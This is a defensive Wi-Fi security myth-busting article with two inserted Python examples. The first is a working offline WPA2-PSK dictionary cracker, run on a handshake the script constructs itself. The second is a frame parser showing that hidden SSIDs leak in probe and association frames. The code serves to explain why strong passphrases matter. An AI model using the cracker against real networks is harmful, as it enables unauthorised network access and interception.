Busting (or Trusting) Wi-Fi Security Myths
We take a hard look at five bits of wireless security conventional wisdom and tell you which are true and which are bogus.
When you're reading up on Wi-Fi security, you'll find many different interpretations and opinions. One might say disabling SSID broadcasting will hide your network, while others might say it just hands hackers an easy job. Some might think WPA encryption is cracked, while others say it's secure. Here we look at each myth and tell you whether it's verified--or busted.
Myth: WEP encryption can be cracked in minutes.
Verdict: Trusted. WEP encryption can be cracked in minutes.
After nearly a decade now, it's no secret. The Wired Equivalent Privacy (WEP) encryption standard, developed by the IEEE, can be cracked. Given enough captured traffic (which an attacker can generate by replaying packets), it can even be cracked in minutes. So, count this myth as True.
Attacks on WEP result in the hacker recovering the encryption key. Then he or she can freely connect to the network, access network shares and resources, and decode all packets. Needless to say, WEP doesn't secure your network from hackers. It only protects you from the average Wi-Fi user.
To provide a secure replacement, the Wi-Fi Alliance developed the Wi-Fi Protected Access (WPA) standard. Additionally, the IEEE ratified another security standard, 802.11i, which the Wi-Fi Alliance certifies as WPA2. (We'll discuss more on these two WPA versions and their fate below.)
To address this problem, make sure you don't use WEP. As we'll discuss, try to use WPA2. You shouldn't have a problem with Wi-Fi products manufactured in 2003 or after. Older products might even support WPA/WPA2 after a simple firmware update. If all else fails, purchase newer equipment or replace the old devices with a wired connection to the network.
Myth: WPA/WPA2-PSK encryption is also crackable.
Verdict: Trusted. Although it can still be secure with longer complex passphrases.
The Pre-Shared Keys (PSK) or passphrases used with WPA and WPA2 encryption can be cracked with off-line brute-force dictionary-based attacks. This means once a hacker captures the right packets from your Wi-Fi network (the four-way handshake exchanged when a client connects), they can test it against a dictionary of words without ever touching your network again. Then if the passphrase you're using is in the dictionary, your encryption is cracked.
These dictionary attacks all depend upon the size and type of the dictionary used by the hacker. The bigger the dictionary, the better the chance he or she has of cracking your passphrase. Each guess requires deriving a key through 4,096 rounds of hashing, so bigger dictionaries take longer to work through, but there are cracking services (such as WPA Cracker) that hackers can use to save time.
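The off-line attack described above, reduced to the arithmetic, as an added example that is not part of the original article. The SSID, passphrase, MAC addresses, nonces, wordlist and EAPOL frame are all constructed here so the script runs without a capture; a real attack feeds the same functions a four-way handshake recorded from the air. The key derivation (PBKDF2-HMAC-SHA1 with 4,096 iterations, the 802.11i PRF-512 and the HMAC-SHA1 MIC used with AES-CCMP) follows the standard; the `MIC_OFFSET` constant is the position of the MIC field inside the EAPOL-Key frame.

```python
import hashlib
import hmac

# Constructed handshake parameters (not captured traffic): the MACs and nonces
# are arbitrary bytes chosen for this example.
SSID = "CorpNet"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))          # 32-byte nonce the AP sends in message 1
SNONCE = bytes(range(32, 64))      # 32-byte nonce the client sends in message 2
MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of key descriptor before the MIC
WORDLIST = ["letmein", "password123", "CorpNet2009", "wireless"]  # constructed


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID as salt, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: the PTK comes from the PMK plus four values visible on the air."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    label = b"Pairwise key expansion\x00"
    blocks = [hmac.new(pmk, label + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(passphrase: str) -> bytes:
    """Construct EAPOL-Key message 2 of the handshake as a client using `passphrase` would send it."""
    key_descriptor = (
        b"\x02"                    # descriptor type: RSN
        + b"\x01\x0a"              # key info: pairwise, MIC present, descriptor version 2 (HMAC-SHA1)
        + b"\x00\x00"              # key length
        + b"\x00" * 7 + b"\x01"    # replay counter
        + SNONCE                   # client nonce
        + b"\x00" * 16             # key IV
        + b"\x00" * 8              # RSC
        + b"\x00" * 8              # key ID
        + b"\x00" * 16             # MIC placeholder, filled in below
        + b"\x00\x00"              # key data length
    )
    frame = b"\x01\x03" + len(key_descriptor).to_bytes(2, "big") + key_descriptor
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]  # KCK = first 128 bits of PTK
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_psk(wordlist, captured_message2: bytes):
    """Offline dictionary attack: recompute the MIC for each candidate; a match reveals the passphrase."""
    captured_mic = captured_message2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, SSID)
        kck = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, captured_message2), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    weak = build_message2("password123")
    strong = build_message2("j7!Qv#p2Lm9&xR4w")
    print("weak passphrase recovered:", crack_psk(WORDLIST, weak))      # password123
    print("strong passphrase recovered:", crack_psk(WORDLIST, strong))  # None
    # The SSID is the PBKDF2 salt, so a precomputed table only works for one network name.
    print("PMK depends on SSID:",
          pmk_from_passphrase("password123", "CorpNet") != pmk_from_passphrase("password123", "HomeNet"))
```

Note what the attacker never needs: any further packets from you. Everything in `crack_psk` is computed from the captured frame, the two MAC addresses and the two nonces, all of which are sent in the clear, which is why only the entropy of the passphrase itself limits the attack.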
To make sure you aren't susceptible to dictionary-based attacks, use longer, more complex passphrases. Don't use real words; get creative and make it look like gibberish, like this example:
Remember, all businesses and organizations should use the Enterprise mode of WPA or WPA2 encryption, which uses 802.1X authentication instead of PSK.
There are other types of attacks developing on the first version of WPA (using TKIP-RC4 encryption), for both the Personal and Enterprise modes. To ensure long-term security, you should be using WPA2 (with AES-CCMP encryption). Most vendors have included support for this standard in their Wi-Fi gear since mid-2004. Even older equipment may be upgradeable via firmware updates.
Keep in mind, some wireless routers and access points allow you to select a WPA/WPA2 mixed mode where it accepts both standards. Even trickier, some let you select the underlying encryption method. You should use WPA2 only, and only with the AES-CCMP encryption method.
Myth: Disabling SSID broadcast, using static IPs, and enabling MAC address filtering protects you from hackers.
Verdict: Busted. Disabling SSID broadcast, using static IPs, and enabling MAC address filtering does not protect you from hackers.
When scouring the Net, you'll find many sites recommending that you disable SSID broadcast, use static IPs, and enable MAC address filtering to help secure your wireless network. Though these techniques protect you from the average Wi-Fi user, they won't stump a hacker. Therefore, we'll call this one out as False.
Disabling SSID broadcasting doesn't make your network name completely hidden: the SSID is removed from beacons, but it still travels in the clear in probe and association frames whenever a client connects, so anyone listening with a wireless sniffer will see it. Disabling DHCP and using static IPs just means hackers will have to take a minute to assign themselves one. Lastly, MAC addresses are sent unencrypted and can be easily spoofed, thus making filtering only a small fence that a hacker can leap over.
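To see where a "hidden" network name still leaks, here is an added example (not code from the original article) that parses the tagged parameters of 802.11 management frames the way a sniffer would. The three frames are constructed in the script, not captured: a beacon from an access point with SSID broadcast disabled (zero-length SSID element), a probe request from a client that remembers the hidden network, and that client's association request. The MAC addresses and the SSID "CorpNet" are made up.

```python
# Constructed 802.11 management frames (not captured traffic).
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
BROADCAST = b"\xff" * 6

# Bytes of fixed-length fields that precede the tagged parameters, by frame subtype
FIXED_BODY_LEN = {
    0x0: 4,   # association request: capability (2) + listen interval (2)
    0x4: 0,   # probe request: tagged parameters start immediately
    0x5: 12,  # probe response: timestamp (8) + beacon interval (2) + capability (2)
    0x8: 12,  # beacon: same layout as probe response
}
SUBTYPE_NAMES = {0x0: "association request", 0x4: "probe request",
                 0x5: "probe response", 0x8: "beacon"}


def ie(tag: int, value: bytes) -> bytes:
    """Encode one information element: tag (1 byte), length (1 byte), value."""
    return bytes([tag, len(value)]) + value


def mgmt_frame(subtype: int, addr1: bytes, addr2: bytes, addr3: bytes, body: bytes) -> bytes:
    """Build a management frame: 24-byte MAC header (frame control, duration,
    three addresses, sequence control) followed by the body."""
    frame_control = bytes([subtype << 4, 0])   # type 0 = management, flags 0
    return frame_control + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00" + body


def parse_ies(data: bytes) -> dict:
    """Walk the tagged parameters and return {tag: value}."""
    ies, i = {}, 0
    while i + 2 <= len(data):
        tag, length = data[i], data[i + 1]
        ies[tag] = data[i + 2:i + 2 + length]
        i += 2 + length
    return ies


def ssid_from_frame(frame: bytes):
    """Return (frame type, SSID) for a management frame; SSID is None when the
    element is absent, empty, or all NUL bytes (the two ways APs 'hide' it)."""
    subtype = frame[0] >> 4
    if subtype not in FIXED_BODY_LEN:
        return None
    body = frame[24 + FIXED_BODY_LEN[subtype]:]
    ssid = parse_ies(body).get(0)            # element ID 0 is the SSID
    if not ssid or ssid == b"\x00" * len(ssid):
        return SUBTYPE_NAMES[subtype], None
    return SUBTYPE_NAMES[subtype], ssid.decode(errors="replace")


def sample_frames():
    """The three constructed frames a sniffer near a hidden network would see."""
    rates = ie(1, bytes([0x82, 0x84, 0x8b, 0x96]))
    hidden_beacon = mgmt_frame(0x8, BROADCAST, AP_MAC, AP_MAC,
                               b"\x00" * 8 + b"\x64\x00" + b"\x11\x04" + ie(0, b"") + rates)
    probe_request = mgmt_frame(0x4, BROADCAST, CLIENT_MAC, BROADCAST,
                               ie(0, b"CorpNet") + rates)
    assoc_request = mgmt_frame(0x0, AP_MAC, CLIENT_MAC, AP_MAC,
                               b"\x11\x04" + b"\x0a\x00" + ie(0, b"CorpNet") + rates)
    return [hidden_beacon, probe_request, assoc_request]


def observed_ssids(frames):
    """What the sniffer learns from a list of frames."""
    return [ssid_from_frame(f) for f in frames]


if __name__ == "__main__":
    for frame_type, ssid in observed_ssids(sample_frames()):
        print(f"{frame_type:20s} -> {ssid!r}")
```

Only the beacon is silent; the client names the network in its probe request (and keeps doing so wherever it goes, looking for the hidden SSID) and again when it associates.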
The only technique that really secures your Wi-Fi is to use encryption, preferably WPA2.
Myth: Personal mode of WPA/WPA2 is okay for small businesses or organizations.
Verdict: Busted. Personal mode of WPA/WPA2 is not okay for small businesses or organizations.
As you may know, there are two very different modes you can use with WPA and WPA2:
- Personal or Pre-Shared Key (PSK) mode
- Enterprise or 802.1X/RADIUS mode
The Personal mode is easier to set up on smaller networks and is great for home environments. However, despite popular belief, it should not be used by businesses or organizations, even small ones. Busted: this myth is False.
Most say that the Personal mode is okay for small businesses (or any small network) because running the more secure Enterprise mode requires an external RADIUS server for the 802.1X authentication. However, these days there are lower cost servers (such as Elektron) targeted for smaller deployments and outsourced services (such as AuthenticateMyWiFi) that host the server for you.
Though running the Enterprise mode requires more money and effort, it better protects your network from misuse by employees and thieves. It gives you more control over who and what connects to the network.
For instance, users can log in to the Wi-Fi network with usernames and passwords you assign rather than input and store the actual encryption keys on their computers, where they can be recovered by the users themselves or by thieves. When someone leaves the organization or loses their laptop, you can revoke their account or change their password. If you were using the Personal mode, you'd have to change the WPA/WPA2 passphrase on all APs, computers, and devices.
Myth: Enterprise mode of WPA/WPA2 is vulnerable to attacks
Verdict: Trusted. Enterprise mode of WPA/WPA2 is vulnerable to attacks.
It's no question that the Enterprise mode of WPA and WPA2 provides better security than the Personal mode. However, this myth is True. The Enterprise mode is also vulnerable to attacks by hackers.
One particular man-in-the-middle attack is where a hacker poses as a legitimate AP, backed by a RADIUS server of their own, to trick clients into handing over the users' login credentials. However, you can protect yourself by making clients validate the server before they authenticate. When configuring the PEAP or certificate settings in Windows on clients, there are three key settings:
- Check the Validate server certificate option and select the Trusted Root Certificate Authority from the list.
- Check the Connect to these servers option, and input the domain name or IP address of the RADIUS server.
- Check Do not prompt user to authorize new servers or trusted certificate authorities.
[Editor's note: Due to an oversight in the original version of this story, Myth #2 has been revised and updated.]
Eric Geier is the Founder and CEO of NoWiresSecurity, which helps businesses easily protect their Wi-Fi with enterprise-level encryption by offering an outsourced RADIUS/802.1X authentication service. He is also the author of many networking and computing books for brands like For Dummies and Cisco Press.